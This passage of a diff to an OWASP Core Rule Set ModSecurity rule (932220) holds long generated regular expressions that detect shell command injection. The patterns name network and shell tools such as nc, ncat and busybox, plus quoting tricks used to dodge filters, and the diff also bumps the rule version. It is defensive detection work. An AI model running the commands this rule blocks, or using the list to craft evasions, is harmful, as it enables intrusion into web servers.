)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?t|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ks])[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[jp][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)(?:[\s\x0b&\),<>\|]|$).*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|o|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*)|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:(?:[at][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|f|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)(?:[\s\x0b&\),<>\|]|$).*|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10}|(?:[\s\x0b&\),<>\|]|$).*))))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\x0b]*|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:G[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?E[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?T|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|[au][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[gr])|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cgi]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b)|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|v)|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cr]|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ex]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h))[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[bdx]|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:[nps]|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dv]|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dt]|[ghu]|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))[\s\x0b&\),<>\|].*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|(?:(?:b|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?t|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ks])[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[jp][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)[\s\x0b&\),<>\|].*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|o|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:(?:[at][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)[\s\x0b&\),<>\|].*|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10}))))" \ "id:932220,\ phase:2,\ block,\ @@ -1253,7 +1325,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1275,6 +1347,8 @@ SecRule 